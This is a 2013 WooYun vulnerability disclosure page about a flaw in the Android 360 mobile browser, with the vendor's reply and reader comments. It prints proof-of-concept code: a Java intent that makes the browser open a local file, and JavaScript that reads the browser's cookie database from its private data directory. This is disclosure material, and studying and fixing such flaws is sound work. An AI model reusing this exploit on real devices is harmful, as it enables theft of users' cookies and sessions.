当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037836

漏洞标题:360手机浏览器缺陷可导致用户敏感数据泄漏

相关厂商:奇虎360

漏洞作者: 路人甲

提交时间:2013-09-23 11:09

修复时间:2013-12-22 11:09

公开时间:2013-12-22 11:09

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-23: 细节已通知厂商并且等待厂商处理中
2013-09-23: 厂商已经确认,细节仅向厂商公开
2013-09-26: 细节向第三方安全合作伙伴开放
2013-11-17: 细节向核心白帽子及相关领域专家公开
2013-11-27: 细节向普通白帽子公开
2013-12-07: 细节向实习白帽子公开
2013-12-22: 细节向公众公开

简要描述:

当一个攻击app(恶意或非恶意均可以) 向360浏览器发送请求要求打开一个本地页面时,此本地页面中的可以按照攻击app的要求获取360浏览器下的所有数据,包括cookie信息等,盗取过程无需root,盗取之后可以发送给远程服务器!求奖励!

详细说明:

Android平台360手机浏览器最新版
MD5: 5b252a142a450b34bd3253acb51882bd
2013年9月22日 17:00

copyFile(); //自定义函数,释放filehehe.html到sd卡上
String url = "file:///mnt/sdcard/filehehe.html";
Intent contIntent = new Intent();
contIntent.setAction("android.intent.action.VIEW");
contIntent.setData(Uri.parse(url));
Intent intent = new Intent();
intent.setClassName("com.qihoo.browser","com.qihoo.browser.BrowserActivity");
intent.setAction("android.intent.action.VIEW");
intent.setData(Uri.parse(url));
this.startActivity(intent);


其中获取关键信息的filehehe.html文件:

function getDatabase() {	
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
}

xmlhttp = request;

var prefix = "file:////data/data/com.qihoo.browser/databases";
var postfix = "/webviewCookiesChromium.db"; //取保存cookie的db
var path = prefix.concat(postfix);
// 获取本地文件代码
xmlhttp.open("GET", path, false);
xmlhttp.send(null);
var ret = xmlhttp.responseText;
return ret;
}


漏洞证明:

有代码了要个蛋的证明

修复方案:

限制file域的访问

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-09-23 19:32

厂商回复:

感谢反馈,该漏洞是Android系统webkit内核对本地文件支持存在的漏洞, 在Android 4.1系统中已修复.
我们会针对4.0版本及以前版本Android系统加紧推出新版本解决这个安全问题.

最新状态:

2013-09-24:修复此漏洞的版本9月24日已上线。


漏洞评价:

评论

  1. 2013-09-23 11:24 | erevus ( 普通白帽子 | Rank:177 漏洞数:31 | Hacked by @ringzero 我錯了)

    →_→神奇的路人甲

  2. 2013-09-23 13:05 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    人生的大起大落,简直是太刺激了。

  3. 2013-09-24 18:40 | 一碗菊花茶 ( 路人 | Rank:20 漏洞数:5 | ,,,。。。,,。。。。,,,。。)

    听说上hao123了,

  4. 2013-09-24 18:43 | 一碗菊花茶 ( 路人 | Rank:20 漏洞数:5 | ,,,。。。,,。。。。,,,。。)

    前排出售娃娃

  5. 2013-11-04 08:48 | ACGT ( 实习白帽子 | Rank:32 漏洞数:4 | another script kiddie)

    路人甲怎么奖励。。